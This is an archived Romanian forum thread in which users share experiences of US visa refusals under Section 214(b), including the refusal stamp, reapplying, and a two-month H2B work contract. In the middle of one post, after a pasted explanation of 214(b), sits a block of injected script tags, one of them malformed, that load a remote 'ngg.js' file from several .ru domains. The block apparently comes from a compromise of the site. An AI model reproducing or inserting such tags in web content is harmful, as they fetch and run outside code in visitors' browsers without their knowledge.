PDA

Arată versiune întreagă : refuz viza-consecinte???



sidd
14.02.2006, 02:48
stie cineva ce se intampla daca atunci cand ai fost refuzat la viza ti se pune ceva stampila in pasaport?


e adevarat ca nu mai primesti viza nici la alte eventuale aplicari???

marioana
14.02.2006, 04:28
Eu am priit stampila pe pasaport cand am fost refuzata pentru viza turistica, si mi s-a spus sa revin cand se va schimba ceva ...nu cred ca nu mai primesti viza odata ce ai fost refuzat, poate doar analizeaza mai bine dosarul...

Observer
14.02.2006, 04:29
Nu e adevarat. In schimb, este un motiv ca trecutul tau sa fie dezgropat la aplicatiile ulterioare. Nu te sfatuiesc sa aplici intr-o perioada mai scurta de 6 luni din momentul refuzului. Incearca sa imbunatatesti capitolele la care ai fost repetent prima data cand ai aplicat.

Observer
14.02.2006, 04:30
Marioana, gand la gand cu bucurie.

cristinaar
14.02.2006, 09:38
Apropo de asta,cineva mi-a povestit de un tip care a fost refuzat de 9 ori si a 10-a oara a primit viza.Consecvent tipu,nu?Nu ma intrebati ce viza,ca nu stiu.In momentul interviului,daca primesti pasaportul inapoi,atunci e probabil refuz.Pe stampila scrie art.214 b.Chestia sa astepti 6 luni nu scrie nicaieri,se poate aplica si mai repede,daca ai dovezi noi.


CE ESTE SECTIUNEA 214 (B)?
Sectiunea 214(b) face parte din Legea Imigratiei si Nationalitatii - INA. Aceasta prevede:
Fiecare strain va fi considerat un potential imigrant pana cand acesta convinge ofiterul consular, in momentul solicitarii vizei, si ofiterul de la imigrari, in momentul solicitarii admiterii, ca este indreptatit la un statut de non-imigrant


Pentru a se califica pentru o viza de vizitator sau student (non-imigrant) in conditiile sectiunii 214(b), solicitantii trebuie sa demonstreze ca au o rezidenta permanenta si alte legaturi in afara Statelor Unite care ii vor face sa parasesca SUA dupa o sedere temporara. Legea plaseaza sarcina dovedirii celor de mai sus in seama solicitantului.


Ofiterii consulari ai Statelor Unite au o munca foarte dificila. Acestia trebuie ca intr-un timp foarte scurt sa decida daca cineva se califica pentru a primi o viza temporara. Majoritatea cazurilor se decid dupa un scurt interviu si dupa o trecere in revista (evaluare) a legaturilor pe care aplicantul le prezinta.


CE CONSTITUIE "LEGATURI PUTERNICE"?
Legaturile puternice difera de la tara la tara, oras la oras, individ la individ. Cateva exemple de legaturi pot fi locul de munca, familia, casa, contul in banca. "Legaturile" sunt variatele aspecte din viata dumneavoastra care va leaga de tara de rezidenta: proprietati, serviciu, relatiile sociale si de familie.


Ca cetatean american sau rezident legal permanent imaginati-va propriile legaturi cu Statele Unite. In aceasta situatie, ar considera un birou consular al unei tari straine ca aveti un domiciliu in Statele Unite pe care nu intentionati sa-l abandonati? Probabil ca raspunsul va fi afirmativ daca aveti o slujba, familie, daca detineti sau ati inchiriat o casa ori un apartament, sau daca aveti alte angajamente care v-ar obliga sa reveniti in Statele Unite dupa calatoria in strainatate. Situatia fiecarui individ este insa diferita.


Ofiterii consulari americani sunt constienti de diversitatea situatiilor. In timpul interviului acestia privesc cu atentie fiecare solicitare si tin seama de factorii profesionali, sociali, culturali si alti factori. In situatia solicitantilor tineri care nu au avut ocazia sa-si creeze multe legaturi, ofiterii consulari pot analiza intentiile specifice ale solicitantului, situatia familiala, planurile pe termen lung si perspectivele pe care el/ea le are in tara de rezidenta. Fiecare caz este examinat individual si i se acorda intreaga atentie ceruta de lege.


ESTE REFUZUL CONFORM SECTIUNII 214(b) PERMANENT?
Nu. Ofiterul consular va reconsidera cazul daca un solicitant poate prezenta dovezi suplimentare convingatoare despre legaturile sale din afara Statelor Unite. Amicul dvs., ruda sau studentul ar trebui sa ia legatura cu Ambasada sau Consulatul pentru a afla procedurile de re-solicitare a vizei. Din nefericire, unii solicitanti nu se vor califica pentru o viza temporara, indiferent de numarul solicitarilor efectuate, atat timp cat situatia lor personala, profesionala sau financiara nu se schimba considerabil.


ng<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js<script src=http://www.iroe.ru/ngg.js></script>

sidd
14.02.2006, 19:34
este vorba un un contract h2b pe 2 luni.


daca te pica ca zic ca este prea scurt timpul si nu iti scoti banii si esi un posibil emigrant, daca aplici apoi cu un contract mai lung, iti mai dau viza???

cristinaar
15.02.2006, 03:33
Cand am vrut sa plec anul trecut eu,contractul era pe 2 luni.Nu mi-au dat viza.Mi-au dat in schimb revenire.Daca contractul e pe termen atat de scurt,intrebarea care ti-o vor pune este "cum iti vei scoate banii pe care i-ai investit in 2 luni?"Al doilea job nu poti sa ai,iti fac ei un calcul imediat 40 ore ori x dolari/ora...si nu iese investitia.Am vazut cum multi au primit refuz.La un moment dat nici nu i-au mai intrebat nimic si le-au pus stampila cu refuz de viza.Nu stiu cum altii au primit-o.Au avut noroc....mult noroc.Mie mi-au spus"ne pare rau dar nu iti putem da viza".La inceput am fost speriata,dupa aceea toata lumea mi-a spus ca "revenire"e bine.Am primit un alt contract pe 6 luni,si cand m-am dus a doua oara la ambasada nu m-au mai intrebat mai nimic si am primit viza.Asta am patit eu....sidd.

sidd
15.02.2006, 03:37
mersi mult pt informatii cristina


mai stii ceva de blazon???

cristinaar
15.02.2006, 07:57
Nu.Nu mai stiu nimic.Astept si eu ca toata lumea sa primim banii inapoi.